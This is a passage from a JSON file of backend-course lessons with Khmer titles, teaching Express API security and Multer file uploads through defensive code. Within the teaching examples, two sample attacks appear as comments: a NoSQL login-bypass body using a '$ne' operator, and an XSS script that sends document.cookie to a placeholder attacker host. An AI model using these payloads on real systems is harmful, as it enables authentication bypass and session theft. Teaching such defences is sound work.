      "objective": "Identify the top OWASP API security threats and understand defense-in-depth strategies.",
      "expectedOutcome": "Risk awareness and defensive coding habits countering prevalent API vulnerabilities.",
      "codeSnippet": "// OWASP API Top 10 Security Checklist:\n// 1. Broken Object Level Authorization (IDOR) -> Verify resource ownership\n// 2. Broken Authentication                    -> bcrypt + short-lived JWTs\n// 3. Broken Object Property Level (Mass Assign) -> Whitelist incoming fields\n// 4. Unrestricted Resource Consumption         -> express-rate-limit\n// 5. Broken Function Level Authorization      -> restrictTo() guards\n// 6. Server-Side Request Forgery (SSRF)       -> Validate outbound URLs\n// 7. Security Misconfiguration                -> Helmet headers + hide stack traces\n// 8. Lack of Protection from Automated Threats -> Captcha / IP throttling\n// 9. Improper Assets Management               -> Deprecate old API versions\n// 10. Unsafe Consumption of APIs              -> Validate 3rd party payloads"
    },
    {
      "id": "M18-02",
      "number": "02",
      "title": "CORS",
      "khmerTitle": "ការកំណត់ Cross-Origin Resource Sharing (CORS)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Cross-Origin Resource Sharing (CORS) is a browser security mechanism that restricts web pages from making AJAX requests to a different domain, port, or protocol than the one serving the web page. The `cors` package in Express manages headers like `Access-Control-Allow-Origin` and handles HTTP `OPTIONS` preflight requests.",
      "tip": "Never use `cors({ origin: '*' })` with `credentials: true` in production! Explicitly whitelist trusted frontend domains via an array or function.",
      "objective": "Configure the cors middleware to securely permit trusted frontend origins while rejecting unauthorized domains.",
      "expectedOutcome": "Secure cross-origin request handling with strict origin whitelisting.",
      "codeSnippet": "import cors from \"cors\";\n\nconst allowedOrigins = [\n  \"https://mywebapplication.com\",\n  \"https://admin.mywebapplication.com\"\n];\n\nconst corsOptions = {\n  origin: (origin, callback) => {\n    // Allow server-to-server or tools with no origin (like Postman or curl)\n    if (!origin || allowedOrigins.includes(origin)) {\n      callback(null, true);\n    } else {\n      callback(new Error(\"Blocked by CORS policy\"));\n    }\n  },\n  credentials: true, // Allow cookies and authorization headers\n  methods: [\"GET\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\", \"OPTIONS\"],\n  allowedHeaders: [\"Content-Type\", \"Authorization\"],\n  maxAge: 86400, // Preflight cache for 24 hours\n};\n\napp.use(cors(corsOptions));"
    },
    {
      "id": "M18-03",
      "number": "03",
      "title": "Helmet",
      "khmerTitle": "ការការពារ HTTP Headers ជាមួយ Helmet",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Helmet is a collection of 15 smaller middleware functions that set secure HTTP response headers. It hides the revealing `X-Powered-By: Express` header, enforces HTTPS via HTTP Strict Transport Security (HSTS), blocks clickjacking with `X-Frame-Options`, prevents MIME-sniffing with `X-Content-Type-Options`, and configures Content Security Policy (CSP).",
      "tip": "Place `app.use(helmet())` at the very top of your Express middleware stack to protect all downstream responses, including error responses.",
      "objective": "Harden HTTP response headers using the helmet middleware package.",
      "expectedOutcome": "Elimination of header-based information leaks and improved security scanning score.",
      "codeSnippet": "import express from \"express\";\nimport helmet from \"helmet\";\n\nconst app = express();\n\n// Enable all standard 15 security headers with sensible defaults\napp.use(helmet());\n\n// Or customize individual header policies:\napp.use(\n  helmet({\n    contentSecurityPolicy: {\n      directives: {\n        defaultSrc: [\"'self'\"],\n        scriptSrc: [\"'self'\", \"https://cdn.trusted.com\"],\n      },\n    },\n    crossOriginEmbedderPolicy: false,\n    hsts: {\n      maxAge: 31536000, // 1 year\n      includeSubDomains: true,\n      preload: true,\n    },\n  })\n);"
    },
    {
      "id": "M18-04",
      "number": "04",
      "title": "Rate Limiting",
      "khmerTitle": "ការកំណត់ចំនួន Request (Rate Limiting) ជាមួយ express-rate-limit",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Rate limiting restricts how many HTTP requests a client IP address can make within a specified time window. It protects APIs from Denial of Service (DoS) attacks, brute-force credential stuffing, and web scraping abuse. The `express-rate-limit` package sets standard `RateLimit-*` headers and returns HTTP `429 Too Many Requests` upon breach.",
      "tip": "Always configure `legacyHeaders: false` and `standardHeaders: true` to comply with modern IETF rate-limiting header specifications.",
      "objective": "Implement global and route-specific rate limits to defend against DoS and abusive scraping.",
      "expectedOutcome": "Resilient API that gracefully throttles excessive requests with HTTP 429.",
      "codeSnippet": "import rateLimit from \"express-rate-limit\";\n\n// Global limiter: 100 requests per 15 minutes per IP\nexport const globalLimiter = rateLimit({\n  windowMs: 15 * 60 * 1000, // 15 minutes\n  max: 100, // Max 100 requests per IP per window\n  standardHeaders: true, // Return standard RateLimit-* headers\n  legacyHeaders: false, // Disable X-RateLimit-* headers\n  message: {\n    status: 429,\n    message: \"Too many requests from this IP, please try again after 15 minutes\"\n  }\n});\n\napp.use(\"/api\", globalLimiter);"
    },
    {
      "id": "M18-05",
      "number": "05",
      "title": "Brute-force Protection",
      "khmerTitle": "ការទប់ស្កាត់ការវាយប្រហារ Brute-force លើ Login Routes",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Authentication routes require aggressive rate limiting compared to general API endpoints. An attacker submitting thousands of password combinations can crack weak passwords or saturate server CPU with bcrypt operations. Strict limiters (e.g. 5 attempts per 15 minutes) or progressive delay mechanisms stop automated brute-force attacks in their tracks.",
      "tip": "Apply strict rate limiting specifically to `/api/v1/auth/login` and `/api/v1/auth/forgot-password` to neutralize automated password dictionary attacks.",
      "objective": "Configure specialized high-friction rate limiters on credential verification routes.",
      "expectedOutcome": "Hardened authentication endpoints that lock out brute-force attackers.",
      "codeSnippet": "import rateLimit from \"express-rate-limit\";\n\n// Strict limiter for sensitive auth routes: 5 attempts per 15 minutes\nexport const authLimiter = rateLimit({\n  windowMs: 15 * 60 * 1000, // 15 minutes\n  max: 5, // Limit each IP to 5 login requests per window\n  skipSuccessfulRequests: true, // Only count failed logins!\n  message: {\n    status: 429,\n    message: \"Too many failed login attempts. Please try again after 15 minutes.\"\n  }\n});\n\n// Apply exclusively to authentication routes\napp.use(\"/api/v1/auth/login\", authLimiter);\napp.use(\"/api/v1/auth/reset-password\", authLimiter);"
    },
    {
      "id": "M18-06",
      "number": "06",
      "title": "Input Validation",
      "khmerTitle": "ការការពារប្រព័ន្ធតាមរយៈ Input Validation",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Rigorous input validation is the primary line of defense against injection attacks, buffer anomalies, and data corruption. By defining strict schema contracts using Zod or Joi, every incoming field must adhere to expected data types, string length boundaries, regex patterns, and allowable values before any business logic executes.",
      "tip": "Strip unexpected properties automatically using strict schema parsers (`schema.parse()`) to prevent Mass Assignment attacks where users inject unauthorized fields like `isAdmin: true`.",
      "objective": "Enforce strict schema validation rules to prevent malicious payloads from reaching application layers.",
      "expectedOutcome": "Zero unvalidated data penetrating beyond the Express middleware layer.",
      "codeSnippet": "import { z } from \"zod\";\n\nexport const updateProfileSchema = z.object({\n  name: z.string().trim().min(2).max(50),\n  bio: z.string().trim().max(300).optional(),\n  website: z.string().url().optional(),\n}).strict(); // .strict() rejects any payload containing unknown fields like 'role'!\n\nexport const validateUpdateProfile = (req, res, next) => {\n  const result = updateProfileSchema.safeParse(req.body);\n  if (!result.success) {\n    return res.status(400).json({\n      status: \"fail\",\n      errors: result.error.flatten().fieldErrors,\n    });\n  }\n  req.body = result.data; // replace with sanitized data\n  next();\n};"
    },
    {
      "id": "M18-07",
      "number": "07",
      "title": "Password Security",
      "khmerTitle": "គោលការណ៍សុវត្ថិភាពពាក្យសម្ងាត់ (NIST Guidelines)",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "Modern password security aligns with NIST Special Publication 800-63B standards. Key recommendations include requiring a minimum of 8 to 12 characters, permitting long passphrases (up to 64+ characters), allowing all printable ASCII and Unicode characters, checking against lists of breached/compromised passwords, and eliminating arbitrary periodic expiration rules.",
      "tip": "Do not enforce frustrating rules like 'must contain 1 special character and 1 uppercase letter' without allowing long passphrases. Length provides far more entropy than character complexity.",
      "objective": "Understand and implement contemporary password strength guidelines based on NIST standards.",
      "expectedOutcome": "User-friendly yet mathematically robust password validation schemas.",
      "codeSnippet": "import { z } from \"zod\";\n\n// NIST-aligned password schema:\nexport const passwordSchema = z\n  .string()\n  .min(10, \"Password must be at least 10 characters long\")\n  .max(128, \"Password cannot exceed 128 characters\")\n  .refine((val) => !/^(password|12345678|qwerty|admin)/i.test(val), {\n    message: \"Password is too common and easily guessable\",\n  });"
    },
    {
      "id": "M18-08",
      "number": "08",
      "title": "JWT Security",
      "khmerTitle": "ការការពារសុវត្ថិភាព JWT (Algorithm Confusion & Secret Entropy)",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "Common JWT security vulnerabilities include using weak signing secrets (crackable in seconds via hashcat), allowing the insecure 'none' algorithm, failing to validate the token's expiration timestamp, and storing sensitive PII in unencrypted payloads. JWT secrets must be at least 256 bits (32 random bytes) of cryptographically secure entropy.",
      "tip": "Generate cryptographic secrets using Node.js crypto: `node -e \"console.log(require('crypto').randomBytes(32).toString('hex'))\"`.",
      "objective": "Harden JWT creation and verification against algorithm confusion and secret brute-forcing.",
      "expectedOutcome": "Cryptographically sound JWT configuration immune to common attack vectors.",
      "codeSnippet": "// 1. Generate strong secret (run in terminal):\n// node -e \"console.log(require('crypto').randomBytes(32).toString('hex'))\"\n\n// 2. Explicitly specify allowed algorithms during verification:\nimport jwt from \"jsonwebtoken\";\n\nexport const verifyTokenSecurely = (token) => {\n  return jwt.verify(token, process.env.JWT_ACCESS_SECRET, {\n    algorithms: [\"HS256\"], // Strictly enforce algorithm (defeats 'none' and RS/HS confusion)\n    issuer: \"api.myenterprise.com\",\n    audience: \"myenterprise-client\",\n  });\n};"
    },
    {
      "id": "M18-09",
      "number": "09",
      "title": "Cookie Security",
      "khmerTitle": "ការការពារសុវត្ថិភាព Cookies (HttpOnly, Secure, SameSite)",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "Cookies carrying session identifiers or refresh tokens must be hardened against theft and misuse. The `HttpOnly` attribute blocks client script extraction, the `Secure` attribute ensures cookies are only transmitted over TLS/HTTPS encrypted connections, and `SameSite=Strict` or `Lax` governs whether cookies are sent across origin boundaries, preventing CSRF.",
      "tip": "Use `SameSite=Lax` for standard web apps where users might follow external links to your site, or `SameSite=Strict` for sensitive single-page APIs.",
      "objective": "Master the triumvirate of cookie security flags: HttpOnly, Secure, and SameSite.",
      "expectedOutcome": "Cookies that cannot be hijacked by XSS or forged by cross-origin CSRF attacks.",
      "codeSnippet": "// Express Cookie Security Best Practice:\nres.cookie(\"token\", value, {\n  httpOnly: true,                         // Defeats XSS (No JS access)\n  secure: process.env.NODE_ENV === \"production\", // Defeats Sniffing (HTTPS only)\n  sameSite: \"strict\",                    // Defeats CSRF (Never sent cross-site)\n  domain: \".myenterprise.com\",           // Restrict to trusted subdomains\n  path: \"/\",\n  maxAge: 3600000,                       // 1 hour\n});"
    },
    {
      "id": "M18-10",
      "number": "10",
      "title": "Environment Variables",
      "khmerTitle": "ការគ្រប់គ្រង Secret Keys និង Environment Variables ដោយសុវត្ថិភាព",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "Secrets like database connection URIs, JWT signing keys, and payment gateway tokens must never be hardcoded in source code or committed to Git repositories. Storing them in `.env` files locally and environment variables in production keeps source code repos safe from catastrophic secret leaks.",
      "tip": "Add `.env*` to your `.gitignore` immediately upon project initialization. Provide a sanitized `.env.example` template with dummy values for team onboarding.",
      "objective": "Establish secure environment configuration workflows preventing credential leakage to version control.",
      "expectedOutcome": "Zero hardcoded credentials in source code and clean environment segregation.",
      "codeSnippet": "# .env.example (Safe to commit to Git)\nNODE_ENV=development\nPORT=5000\nMONGODB_URI=mongodb://localhost:27017/app_dev\nJWT_ACCESS_SECRET=replace_with_min_32_bytes_random_hex_key\nJWT_REFRESH_SECRET=replace_with_min_32_bytes_random_hex_key\n\n# .gitignore (MANDATORY)\n.env\n.env.local\n.env.production"
    },
    {
      "id": "M18-11",
      "number": "11",
      "title": "Sensitive Information",
      "khmerTitle": "ការការពារទិន្នន័យសម្ងាត់ (Data Masking & Sanitization)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Sensitive information like passwords, credit card numbers, national IDs, and internal server paths must never appear in HTTP responses, error logs, or query strings. In Mongoose, schema definitions should mark sensitive fields with `select: false` so queries never retrieve them by default.",
      "tip": "Use `select: false` on Mongoose password fields. When logging errors in production, strip headers that contain `Authorization` or `Cookie` tokens.",
      "objective": "Prevent sensitive credential and system data leaks across API responses and logs.",
      "expectedOutcome": "Clean response payloads with automatic exclusion of internal hashes and secrets.",
      "codeSnippet": "// 1. In Mongoose Schema:\nconst userSchema = new mongoose.Schema({\n  email: { type: String, required: true },\n  password: { type: String, required: true, select: false }, // Never selected by default\n  passwordResetToken: { type: String, select: false },\n});\n\n// 2. In Model JSON transformation:\nuserSchema.set(\"toJSON\", {\n  transform: (doc, ret) => {\n    delete ret.password;\n    delete ret.__v;\n    return ret;\n  }\n});"
    },
    {
      "id": "M18-12",
      "number": "12",
      "title": "NoSQL Injection",
      "khmerTitle": "ការទប់ស្កាត់ការវាយប្រហារ NoSQL Injection",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "NoSQL injection occurs when attackers submit MongoDB operator objects (like `{\"$gt\": \"\"}`) in place of string parameters. In a query like `User.findOne({ email: req.body.email, password: req.body.password })`, sending `{\"$ne\": null}` as the password satisfies the condition and bypasses authentication. Sanitizing inputs with `express-mongo-sanitize` strips all `$` and `.` characters.",
      "tip": "Install `express-mongo-sanitize` and mount it globally to automatically strip `$` operators from `req.body`, `req.query`, and `req.params`.",
      "objective": "Identify NoSQL injection mechanics and deploy automated sanitization middleware.",
      "expectedOutcome": "Complete immunity against MongoDB operator injection attacks.",
      "codeSnippet": "import mongoSanitize from \"express-mongo-sanitize\";\n\n// Attack scenario if unsanitized:\n// Attacker sends POST body: { \"email\": \"admin@app.com\", \"password\": { \"$ne\": null } }\n// MongoDB interprets: Find admin where password is not null -> LOGIN BYPASSED!\n\n// Defense: Mount express-mongo-sanitize\n// Replaces prohibited characters ($, .) with underscores or removes them entirely\napp.use(mongoSanitize());\n\n// Also enforce strict string schemas with Zod:\nconst loginSchema = z.object({\n  email: z.string().email(),\n  password: z.string().min(1), // Rejects objects like {\"$ne\": null} with 400 Bad Request!\n});"
    },
    {
      "id": "M18-13",
      "number": "13",
      "title": "XSS",
      "khmerTitle": "ការទប់ស្កាត់ការវាយប្រហារ Cross-Site Scripting (XSS)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Cross-Site Scripting (XSS) occurs when untrusted user HTML or JavaScript input is reflected into web pages without proper encoding or sanitization. While modern frontend frameworks like React automatically escape JSX expressions, backend APIs should sanitize text fields using tools like `xss-clean` or `isomorphic-dompurify` to prevent stored malicious scripts.",
      "tip": "Sanitize user-generated rich text fields (like blog content or comments) on the server before saving to MongoDB using DOMPurify.",
      "objective": "Understand XSS mechanics and apply server-side HTML entity sanitization.",
      "expectedOutcome": "Clean database records free from executable script injections.",
      "codeSnippet": "import DOMPurify from \"isomorphic-dompurify\";\n\nexport const sanitizeContent = (req, res, next) => {\n  if (req.body.content) {\n    // Strips <script>, javascript: links, and malicious attributes like onerror=...\n    req.body.content = DOMPurify.sanitize(req.body.content);\n  }\n  if (req.body.bio) {\n    req.body.bio = DOMPurify.sanitize(req.body.bio);\n  }\n  next();\n};\n\n// Attack: \"<script>fetch('http://attacker.com?c='+document.cookie)</script>Hello\"\n// Output: \"Hello\""
    },
    {
      "id": "M18-14",
      "number": "14",
      "title": "CSRF",
      "khmerTitle": "ការយល់ដឹង និងការពារ Cross-Site Request Forgery (CSRF)",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "Cross-Site Request Forgery (CSRF) tricks a user's browser into executing unwanted actions on an authenticated web app where the user is logged in via ambient cookies. Modern Single Page Applications (SPAs) communicating via `Authorization: Bearer <token>` headers are inherently immune to CSRF because browsers never attach authorization headers automatically across cross-origin requests.",
      "tip": "If using cookies for authentication, set `SameSite: 'strict'` or `'lax'` — this modern browser standard eliminates the need for complex CSRF tokens in 99% of web apps.",
      "objective": "Understand the mechanics of CSRF and modern defenses like SameSite cookies and custom headers.",
      "expectedOutcome": "Solid understanding of when CSRF protection is required vs when Bearer tokens render it moot.",
      "codeSnippet": "// Why Bearer Tokens in headers are immune to CSRF:\n// 1. In CSRF, a malicious website triggers: <form action=\"https://bank.com/transfer\" method=\"POST\">\n// 2. The browser automatically attaches COOKIES.\n// 3. The browser NEVER automatically attaches custom HEADERS like:\n//    \"Authorization: Bearer <token>\"\n//\n// Therefore:\n// - Bearer Auth (in Header): Immune to CSRF by design.\n// - Cookie Auth: Requires SameSite=\"strict\" or Anti-CSRF Synchronizer Tokens."
    },
    {
      "id": "M18-15",
      "number": "15",
      "title": "Secure API Design",
      "khmerTitle": "គោលការណ៍គ្រឹះនៃស្ថាបត្យកម្ម API ប្រកបដោយសុវត្ថិភាព",
      "type": "architecture",
      "codeLanguage": "javascript",
      "summary": "Building production-grade secure APIs requires Defense in Depth — stacking multiple layers of protection so that if one layer fails, others stop the breach. This encompasses input validation, rate limiting, helmet security headers, sanitized database queries, least privilege roles, audit logging, and automated dependency vulnerability scanning via `npm audit`.",
      "tip": "Integrate `npm audit --audit-level=high` into your CI/CD pipeline to catch known vulnerable dependencies before deploying to production.",
      "objective": "Synthesize all security layers into an enterprise-grade Express middleware pipeline.",
      "expectedOutcome": "Hardened Express server setup incorporating comprehensive security defenses.",
      "codeSnippet": "// app.js - Enterprise Security Middleware Pipeline:\nimport express from \"express\";\nimport helmet from \"helmet\";\nimport cors from \"cors\";\nimport mongoSanitize from \"express-mongo-sanitize\";\nimport { globalLimiter } from \"./middleware/rateLimit.js\";\nimport { errorHandler } from \"./middleware/errorHandler.js\";\n\nconst app = express();\n\n// 1. HTTP Security Headers\napp.use(helmet());\n\n// 2. CORS Policy\napp.use(cors({ origin: process.env.ALLOWED_ORIGINS.split(\",\"), credentials: true }));\n\n// 3. Rate Limiting\napp.use(\"/api\", globalLimiter);\n\n// 4. Body Parser with Size Limits (Prevents payload DoS)\napp.use(express.json({ limit: \"10kb\" }));\n\n// 5. Data Sanitization against NoSQL Injection\napp.use(mongoSanitize());\n\n// 6. Central Error Handling (Never leaks stack traces in production)\napp.use(errorHandler);\n\nexport default app;"
    }
  ],
  "M19": [
    {
      "id": "M19-01",
      "number": "01",
      "title": "File Upload Concepts",
      "khmerTitle": "គោលការណ៍គ្រឹះនៃការ Upload ឯកសារក្នុង Web Backend",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "Uploading files requires handling binary streaming data rather than standard JSON payloads. HTTP transfers binary files using the `multipart/form-data` encoding format. Because `express.json()` only decodes application/json, specialized streaming parsers like `multer` are required to intercept, chunk, validate, and buffer binary byte streams into memory or disk.",
      "tip": "Never parse file uploads entirely in memory on production servers handling high concurrent traffic — large files can exhaust available Node.js RAM and trigger OOM crashes.",
      "objective": "Understand binary streams, MIME types, and multipart form encoding in HTTP file uploads.",
      "expectedOutcome": "Clear grasp of file upload life cycles from browser dispatch to server storage.",
      "codeSnippet": "// HTTP Request Header for File Uploads:\n// POST /api/v1/uploads\n// Content-Type: multipart/form-data; boundary=---------------------------974767299852498929531610575\n//\n// ---------------------------974767299852498929531610575\n// Content-Disposition: form-data; name=\"avatar\"; filename=\"profile.png\"\n// Content-Type: image/png\n//\n// <Binary byte data here...>\n// ---------------------------974767299852498929531610575--"
    },
    {
      "id": "M19-02",
      "number": "02",
      "title": "Multipart Form Data",
      "khmerTitle": "ការស្វែងយល់ពីទម្រង់ Multipart Form Data",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "A `multipart/form-data` payload breaks an HTTP message body into multiple distinct sections delimited by unique boundary strings. Each section contains its own mini-headers (e.g. `Content-Disposition`, `Content-Type`) followed by that field's text or raw binary contents. This allows text form fields and multiple files to be submitted concurrently in a single HTTP request.",
      "tip": "Ensure frontend clients do NOT manually set `Content-Type: multipart/form-data` with `fetch` or `axios` — let the browser set it automatically with the correct dynamic boundary string.",
      "objective": "Learn how the HTTP boundary delimiter splits form fields and binary payloads.",
      "expectedOutcome": "Accurate debugging of multipart headers and frontend payload preparation.",
      "codeSnippet": "// Frontend form data preparation:\nconst formData = new FormData();\nformData.append(\"title\", \"My Summer Vacation\"); // Regular text field\nformData.append(\"coverImage\", fileInput.files[0]); // Binary file field\n\n// Using fetch: DO NOT explicitly set Content-Type! Browser appends boundary automatically!\nconst res = await fetch(\"/api/v1/posts\", {\n  method: \"POST\",\n  body: formData, // Browser sets: 'multipart/form-data; boundary=----WebKitFormBoundary...'\n});"
    },
    {
      "id": "M19-03",
      "number": "03",
      "title": "Multer",
      "khmerTitle": "ការដំឡើង និងកំណត់រចនាសម្ព័ន្ធ Multer Middleware",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Multer is the standard Node.js middleware for handling `multipart/form-data`. It integrates with Express by parsing incoming streams and attaching a `req.file` (for single files) or `req.files` (for multiple files) object containing metadata such as original filename, MIME type, size, and destination path or buffer.",
      "tip": "Multer ignores any form that is NOT `multipart/form-data`. Ensure all upload forms specify the correct enctype.",
      "objective": "Configure Multer middleware for single and multi-file upload routes.",
      "expectedOutcome": "Successful integration of Multer processing single and multi-part payloads.",
      "codeSnippet": "import multer from \"multer\";\n\n// Basic in-memory storage configuration\nconst upload = multer({\n  storage: multer.memoryStorage(),\n  limits: { fileSize: 5 * 1024 * 1024 }, // 5 MB max\n});\n\n// Single file upload route\napp.post(\"/api/upload-avatar\", upload.single(\"avatar\"), (req, res) => {\n  console.log(\"Uploaded file metadata:\", req.file);\n  console.log(\"Text fields:\", req.body);\n\n  res.json({\n    status: \"success\",\n    filename: req.file.originalname,\n    size: req.file.size,\n    mimetype: req.file.mimetype,\n  });\n});"
    },
    {
      "id": "M19-04",
      "number": "04",
      "title": "Upload Images",
      "khmerTitle": "ការ Upload រូបភាព (Single & Multiple Image Uploads)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Image upload routes often accept either a single image (e.g. user avatar) or a collection of images (e.g. product gallery). Using `upload.single('avatar')` handles one file, while `upload.array('photos', 5)` accepts up to 5 images under the same field name. `upload.fields()` allows handling mixed fields like one cover image and several gallery photos.",
      "tip": "Use `upload.fields([{ name: 'cover', maxCount: 1 }, { name: 'gallery', maxCount: 8 }])` for e-commerce product endpoints.",
      "objective": "Handle single, array, and mixed multi-field image uploads in Express.",
      "expectedOutcome": "Versatile image upload routes supporting complex multi-image forms.",
      "codeSnippet": "// routes/product.routes.js\nimport multer from \"multer\";\nconst upload = multer({ dest: \"uploads/temp\" });\n\n// Handling mixed fields: 1 cover image + up to 5 gallery images\nconst productUploads = upload.fields([\n  { name: \"coverImage\", maxCount: 1 },\n  { name: \"gallery\", maxCount: 5 },\n]);\n\nrouter.post(\"/products\", productUploads, (req, res) => {\n  const cover = req.files[\"coverImage\"]?.[0];\n  const gallery = req.files[\"gallery\"] || [];\n\n  res.json({\n    status: \"success\",\n    coverFilename: cover?.filename,\n    galleryCount: gallery.length,\n  });\n});"
    },
    {
      "id": "M19-05",
      "number": "05",
      "title": "Upload Documents",
      "khmerTitle": "ការ Upload ឯកសារ PDF និង Office Documents",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Document uploads (e.g. PDF resumes, spreadsheets, Word documents) require distinct validation compared to images. Checking the MIME type and file extension ensures executable binaries (like `.exe` or `.sh`) disguised as documents are promptly rejected before reaching storage.",
      "tip": "Do not trust file extensions alone! Always check the MIME type (`file.mimetype`) and inspect the file magic bytes buffer for bulletproof security.",
      "objective": "Build document upload routes strictly accepting verified PDF and Office formats.",
      "expectedOutcome": "Secure document ingestion rejecting unauthorized executable files.",
      "codeSnippet": "const documentFilter = (req, file, cb) => {\n  const allowedMimeTypes = [\n    \"application/pdf\",\n    \"application/msword\",\n    \"application/vnd.openxmlformats-officedocument.wordprocessingml.document\",\n  ];\n\n  if (allowedMimeTypes.includes(file.mimetype)) {\n    cb(null, true);\n  } else {\n    cb(new AppError(\"Invalid file format. Only PDF and Word documents are permitted!\", 400), false);\n  }\n};\n\nexport const uploadDocument = multer({\n  storage: multer.memoryStorage(),\n  fileFilter: documentFilter,\n  limits: { fileSize: 10 * 1024 * 1024 }, // 10 MB limit for documents\n});"
    },
    {
      "id": "M19-06",
      "number": "06",
      "title": "File Validation",
      "khmerTitle": "ការផ្ទៀងផ្ទាត់ប្រភេទ និងភាពត្រឹមត្រូវនៃឯកសារ (File Filter)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Multer provides a `fileFilter` callback to evaluate incoming files before saving them. The filter receives `req`, `file`, and a `cb` callback. Passing `cb(null, true)` accepts the file, while `cb(new AppError(...), false)` rejects the upload. Validating both MIME types and extensions stops malicious script uploads.",
      "tip": "Reject SVG files if user avatars are rendered directly in browsers unless sanitized — SVGs can embed inline JavaScript and trigger XSS attacks.",
      "objective": "Implement a custom fileFilter callback rejecting dangerous file types.",
      "expectedOutcome": "Strict file filtering protecting server storage from malicious file extensions.",
      "codeSnippet": "import path from \"node:path\";\n\nconst imageFileFilter = (req, file, cb) => {\n  const allowedExtensions = /jpeg|jpg|png|webp/;\n  const ext = path.extname(file.originalname).toLowerCase();\n  const isValidExt = allowedExtensions.test(ext);\n  const isValidMime = file.mimetype.startsWith(\"image/\");\n\n  if (isValidExt && isValidMime) {\n    cb(null, true);\n  } else {\n    cb(new AppError(\"Only image files (JPEG, PNG, WebP) are allowed!\", 400), false);\n  }\n};"
    },
    {
      "id": "M19-07",
      "number": "07",
      "title": "File Size Limits",
      "khmerTitle": "ការកំណត់ទំហំអតិបរមានៃឯកសារ (File Size Limits & Multer Errors)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Unrestricted file size limits allow malicious actors to flood server storage and cause memory exhaustion. Multer accepts a `limits` object where `fileSize` specifies the maximum byte threshold. When a file exceeds the limit, Multer aborts and raises a `LIMIT_FILE_SIZE` error code, which must be converted into a friendly 400 response.",
      "tip": "Catch `multer.MulterError` in your global Express error middleware to deliver clean, custom error messages instead of raw crash traces.",
      "objective": "Enforce strict byte limits on uploads and handle MulterError exceptions gracefully.",
      "expectedOutcome": "Predictable, user-friendly 400 Bad Request responses upon file size violations.",
      "codeSnippet": "// 1. Configure limit\nconst upload = multer({\n  limits: {\n    fileSize: 2 * 1024 * 1024, // 2MB in bytes\n    files: 5, // Maximum 5 files per request\n  },\n});\n\n// 2. Catch MulterError in global error middleware:\nexport const handleMulterError = (err, req, res, next) => {\n  if (err instanceof multer.MulterError) {\n    if (err.code === \"LIMIT_FILE_SIZE\") {\n      return res.status(400).json({\n        status: \"fail\",\n        message: \"File too large. Maximum allowed size is 2MB.\",\n      });\n    }\n    return res.status(400).json({ status: \"fail\", message: err.message });\n  }\n  next(err);\n};"
    },
    {
      "id": "M19-08",
      "number": "08",
      "title": "File Storage",
      "khmerTitle": "យុទ្ធសាស្ត្រជ្រើសរើសទីតាំងផ្ទុកឯកសារ (Local vs Cloud Storage)",
      "type": "architecture",
      "codeLanguage": "javascript",
      "summary": "Modern backend architectures choose between storing uploads on local server disks or offloading them to managed cloud object storage (AWS S3, Cloudflare R2). Local disk storage is simple for development, but in production, containerized deployments (Docker/Kubernetes) lose local files on restart unless persistent volumes are attached. Cloud object storage provides infinite durability and global CDN delivery.",
      "tip": "Never store production user uploads on the ephemeral local container filesystem. Always use object storage like S3 or R2 for production backends.",
      "objective": "Evaluate trade-offs between local filesystem storage and cloud object stores.",
      "expectedOutcome": "Architectural strategy suited for stateless, scalable container deployments.",
      "codeSnippet": "// Comparison Matrix:\n// Feature            | Local Disk Storage       | Cloud Object Storage (S3/R2)\n// -------------------+--------------------------+------------------------------\n// Setup Complexity   | Zero (built-in)          | Requires cloud credentials & SDK\n// Scalability        | Limited to server disk   | Infinite, virtually unlimited\n// Docker Containers  | Ephemeral (Lost on reboot)| Persistent & stateless\n// Global CDN         | Needs reverse proxy setup| Built-in CDN edge distribution\n// Backup/Durability  | Manual backups required  | 99.999999999% (11 9s) durability"
    },
    {
      "id": "M19-09",
      "number": "09",
      "title": "Local Storage",
      "khmerTitle": "ការរៀបចំ Multer DiskStorage លើ Local Filesystem",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Multer's `diskStorage` engine gives complete control over where files are written and how they are named. Custom `destination` callbacks dynamically route files into organized subdirectories (e.g. `uploads/avatars`), while `filename` callbacks prepend unique timestamps or UUIDs to avoid name collision overwrites.",
      "tip": "Always generate random filenames (e.g. `user-123-1773729600.jpg`) rather than saving `file.originalname`, which may contain spaces or path traversal characters (`../../`).",
      "objective": "Configure Multer diskStorage with deterministic path generation and collision-free names.",
      "expectedOutcome": "Organized on-disk storage with sanitized, collision-free file naming.",
      "codeSnippet": "import multer from \"multer\";\nimport path from \"node:path\";\nimport crypto from \"node:crypto\";\n\nconst storage = multer.diskStorage({\n  destination: (req, file, cb) => {\n    cb(null, \"public/uploads/avatars\");\n  },\n  filename: (req, file, cb) => {\n    // Generate: user-<id>-<randomHex><ext>\n    const uniqueSuffix = crypto.randomBytes(8).toString(\"hex\");\n    const ext = path.extname(file.originalname).toLowerCase();\n    cb(null, `user-${req.user?._id || \"anon\"}-${uniqueSuffix}${ext}`);\n  },\n});\n\nexport const uploadAvatarLocal = multer({ storage });"
    },
    {
      "id": "M19-10",
      "number": "10",
      "title": "Cloud Storage",
      "khmerTitle": "ស្ថាបត្យកម្ម Cloud Object Storage (S3-Compatible)",
      "type": "architecture",
      "codeLanguage": "javascript",
